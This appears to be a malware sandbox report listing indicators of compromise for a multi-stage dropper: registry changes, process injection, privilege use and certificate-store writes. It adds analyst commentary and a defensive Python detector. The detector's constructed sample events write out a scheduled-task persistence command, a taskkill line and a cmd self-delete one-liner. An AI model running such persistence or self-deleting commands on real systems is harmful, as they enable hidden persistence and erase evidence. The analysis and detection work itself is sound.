Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key 
created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight 
Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe -
Modifies registry class 64 IoCs
Processes:
description ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\Instance\ Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "6" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) 
\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 
00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = ffffffff Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000008e543d9212004170704461746100400009000400efbe8e543d92e55473672e0000008ce10100000001000000000000000000000000000000c97e6b004100700070004400610074006100000016000000 Set value (data) 
\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff Set value (str) 
\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 9200310000000000e554446810003732424637337e3100007a0009000400efbee5544468e55447682e0000009c310200000008000000000000000000000000000000f18b3d00370032006200660037003300300033002d0035006400630030002d0034003400650039002d0038003700640038002d00360039003800660038003600370037006100630061006200000018000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 5000310000000000e554446810004c6f63616c003c0009000400efbe8e543d92e55444682e0000009fe10100000001000000000000000000000000000000f18b3d004c006f00630061006c00000014000000 Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" Set value (int) 
\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "8" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 -
Processes:
  description       ioc                                                                                                                              process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349                 kdnmdIr2m3Z75rmoxMQY45zR.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted from the report)  kdnmdIr2m3Z75rmoxMQY45zR.exe
The AuthRoot store is where CryptoAPI caches root certificates fetched from the Windows automatic root update service the first time a chain needs them, so a write here is normally a side-effect of the process validating a signature or a TLS certificate, not a deliberate root install. Check the thumbprint against Microsoft's published trusted root list before treating it as a rogue CA.
-
Runs ping.exe 1 TTPs 5 IoCs
Processes:
  pid     process
  6000    PING.EXE
  109156  PING.EXE
  109316  PING.EXE
  109376  PING.EXE
  109464  PING.EXE
-
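The schtasks, timeout, tasklist, taskkill and ping signatures above are each unremarkable alone; what makes them worth alerting on is the same parent spawning several of them, plus the cmd.exe "wait, then del" idiom that timeout and localhost pings usually serve. The script below is an added example written for this page, not sandbox tooling: it attributes each living-off-the-land child to its parent, tags the technique, detects the self-delete one-liner, and flags parents that combine three techniques or self-delete. The report lists only PIDs and image names for these tools, so the events, PIDs and command lines below are constructed and hypothetical.

```python
"""Score a process tree for the living-off-the-land chain this report
shows: schtasks for persistence, timeout/ping as delays, tasklist for
discovery, taskkill to remove competitors or security tools, and the
cmd.exe 'wait then del' self-delete. Added example written for this page.
The events are constructed and the command lines hypothetical: the report
lists only PIDs and image names for these tools."""
import re

# Constructed process-creation events: (pid, ppid, image, command line).
SAMPLE_EVENTS = [
    (100, 1,   "dropper.exe",  r'"C:\Users\Admin\AppData\Local\Temp\dropper.exe"'),
    (103, 100, "schtasks.exe", r'schtasks /create /sc minute /mo 1 /tn "Updater" /tr "C:\Users\Admin\AppData\Roaming\u.exe" /f'),
    (104, 100, "tasklist.exe", "tasklist /fo csv"),
    (105, 100, "taskkill.exe", "taskkill /f /im chrome.exe"),
    (101, 100, "cmd.exe",      r'cmd.exe /c timeout /t 3 & del "C:\Users\Admin\AppData\Local\Temp\dropper.exe"'),
    (102, 101, "timeout.exe",  "timeout /t 3"),
    (106, 101, "PING.EXE",     "ping 127.0.0.1 -n 4"),
    (300, 1,   "svchost.exe",  "svchost.exe -k netsvcs"),
    (301, 300, "schtasks.exe", "schtasks /query /fo list"),
]

# cmd.exe one-liner that waits (timeout or ping) and then deletes a file.
SELF_DELETE_RE = re.compile(r"\b(timeout|ping)\b[^&]*&+\s*del\b", re.I)


def technique(image, cmdline):
    """Tag a child process with the technique it implements, or None when
    the tool is used in a way that is not interesting on its own."""
    img = image.lower()
    if img == "schtasks.exe":
        return "persistence" if re.search(r"/create\b", cmdline, re.I) else None
    if img == "ping.exe":
        # Only the localhost-ping-as-sleep idiom counts as a delay.
        return "delay" if re.search(r"127\.0\.0\.1|localhost", cmdline, re.I) else None
    return {"timeout.exe": "delay", "tasklist.exe": "discovery",
            "taskkill.exe": "kill"}.get(img)


def analyze(events, min_techniques=3):
    """Per pid: image, sorted techniques its direct children implement,
    whether its own command line is a self-delete, and a verdict."""
    info = {pid: {"image": img, "techniques": set(),
                  "self_delete": bool(SELF_DELETE_RE.search(cmd))}
            for pid, _ppid, img, cmd in events}
    for _pid, ppid, img, cmd in events:
        tag = technique(img, cmd)
        if tag and ppid in info:
            info[ppid]["techniques"].add(tag)
    verdicts = {}
    for pid, d in info.items():
        techs = sorted(d["techniques"])
        verdicts[pid] = {
            "image": d["image"],
            "techniques": techs,
            "self_delete": d["self_delete"],
            "flagged": d["self_delete"] or len(techs) >= min_techniques,
        }
    return verdicts


def flagged_images(events):
    """Sorted image names of every flagged process."""
    return sorted(v["image"] for v in analyze(events).values() if v["flagged"])


if __name__ == "__main__":
    for pid, v in sorted(analyze(SAMPLE_EVENTS).items()):
        mark = "!" if v["flagged"] else " "
        print(f"{mark} {pid:4d} {v['image']:14s} {v['techniques']} self_delete={v['self_delete']}")
```

Scoring the parent rather than the child is the point: schtasks /query from a service host earns nothing, while a dropper that creates a task, lists processes and kills one is flagged even before its cmd.exe child removes it from disk.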
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment. "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" is the default User-Agent of the WinHttpRequest COM object, the HTTP client reachable from VBScript, JScript and PowerShell, so a request carrying it was made by a script or by code reusing that object rather than by a browser. It is a cheap egress-filter rule, with the caveat that some legitimate administrative scripts leave the same default in place.
Processes:
  description             flow  ioc
  HTTP User-Agent header  256   Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid    process
  65352  SmartClock.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (the report lists one hit per call; grouped here by pid, 64 hits in total):
  pid   process                                                                 hits
  4196  faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe  8
  4040  vl16pz8ikehSoCEiO6vpU86F.exe                                            4
  5060  TUsKZ9i3PovwwAgsSaLpghkJ.exe                                            2
  2032  (image name not recorded in the report)                                 46
  968   uw5KPJ6a18gzLPne_F5e0c1_.exe                                            2
  2908  powershell.exe                                                          2
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  PID 2032  (no image name in report)
Suspicious behavior: MapViewOfSection 30 IoCs
Processes:
  PID 5060  TUsKZ9i3PovwwAgsSaLpghkJ.exe  (1 entry)
  PID 1424  Itvrzxmax2.exe  (1 entry)
  PID 2032  (no image name in report)  (4 entries)
  PID 3204  6DF1.exe  (1 entry)
  PID 2032  (no image name in report)  (4 entries)
  PID 3624  8AF1.exe  (1 entry)
  PID 2032  (no image name in report)  (18 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  Token: SeDebugPrivilege  PID 4960  SETUP_~2.EXE
  Token: SeDebugPrivilege  PID 1744  wd1PHHYFXTO2GwSbYNeKiEhd.exe
  Token: SeDebugPrivilege  PID 2948  4AqwIgOuAzGydA7_h8I9ZZtr.exe
  Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating)  PID 2032  (no image name in report)  (3 pairs, 6 entries)
  Token: SeDebugPrivilege  PID 968   uw5KPJ6a18gzLPne_F5e0c1_.exe
  Token: SeDebugPrivilege  PID 4040  vl16pz8ikehSoCEiO6vpU86F.exe
  Token: SeDebugPrivilege  PID 2908  powershell.exe
  Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating)  PID 2032  (no image name in report)  (25 pairs, 50 entries)
  Token: SeDebugPrivilege  PID 4688  RunDll32.exe
  Token: SeShutdownPrivilege  PID 2032  (no image name in report)
Suspicious use of FindShellTrayWindow 35 IoCs
Processes:
  PID 2032    (no image name in report)  (5 entries)
  PID 109144  Tal.exe.pif  (1 entry)
  PID 2032    (no image name in report)  (2 entries)
  PID 109144  Tal.exe.pif  (2 entries)
  PID 2032    (no image name in report)  (2 entries)
  PID 109296  Tal.exe.pif  (1 entry)
  PID 2032    (no image name in report)  (2 entries)
  PID 109296  Tal.exe.pif  (2 entries)
  PID 2032    (no image name in report)  (18 entries)
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
  PID 2032    (no image name in report)  (45 entries)
  PID 109144  Tal.exe.pif  (3 entries)
  PID 109296  Tal.exe.pif  (3 entries)
  PID 2032    (no image name in report)  (13 entries)
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
  PID 2032  (no image name in report)  (4 entries)
  PID 5640  3A2F1MAI23B9J52.exe  (2 entries)
  PID 5396  BvEl9bplplH_zds3oc3G9TH2.exe  (2 entries)
  PID 5996  BvEl9bplplH_zds3oc3G9TH2.exe  (2 entries)
  PID 4320  0B7121CH132B0JI.exe  (2 entries)
  PID 2596  IHH9FGG6KIID6CG.exe  (2 entries)
  PID 2032  (no image name in report)  (1 entry)
Suspicious use of UnmapMainImage 1 IoCs
Processes:
  PID 2032  (no image name in report)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  PID 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe wrote to memory of:
    PID 4196  faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe  (10 entries)
  PID 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe wrote to memory of:
    PID 3704  sd1gX57A0wItT05S8cNnJS6P.exe  (3 entries)
    PID 4436  1hObAWF58hoo9_jA8jPWtwDx.exe  (3 entries)
    PID 4052  EYGVHMYze8w9bXCxKAs0sRH8.exe  (3 entries)
    PID 2948  4AqwIgOuAzGydA7_h8I9ZZtr.exe  (3 entries)
    PID 1744  wd1PHHYFXTO2GwSbYNeKiEhd.exe  (3 entries)
    PID 2520  jtfXiAYn71DsfeALHUTabEl4.exe  (3 entries)
    PID 2712  CzOCCnZhsTntOC1DD4Afra50.exe  (3 entries)
    PID 3244  FzbLA0y21wf4Eb_GXZGPAkPK.exe  (3 entries)
    PID 1216  Kog456fPoi_qlj0gOuQ1ue72.exe  (3 entries)
    PID 3964  kdnmdIr2m3Z75rmoxMQY45zR.exe  (3 entries)
    PID 3232  _az72zCJh0iBWr5dTACKXrws.exe  (3 entries)
    PID 3680  HNYUwmuil6MtmEKe7lmDsMC3.exe  (3 entries)
    PID 4040  vl16pz8ikehSoCEiO6vpU86F.exe  (3 entries)
    PID 4316  FnPK_uULTBfwZezEEGCXaVE6.exe  (2 entries)
    PID 2284  l2S7FrWODIlvtiOh9PM4XNlS.exe  (3 entries)
    PID 1624  H4qQ5eq5WgfPy9pgenBRiiaH.exe  (3 entries)
    PID 5060  TUsKZ9i3PovwwAgsSaLpghkJ.exe  (3 entries)
  PID 2520 jtfXiAYn71DsfeALHUTabEl4.exe wrote to memory of:
    PID 2020  jtfXiAYn71DsfeALHUTabEl4.exe  (3 entries)
  PID 4316 FnPK_uULTBfwZezEEGCXaVE6.exe wrote to memory of:
    PID 4960  SETUP_~2.EXE  (1 entry)
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
  PID 5056  attrib.exe
  PID 5628  attrib.exe
outlook_win_path 1 IoCs
Processes:
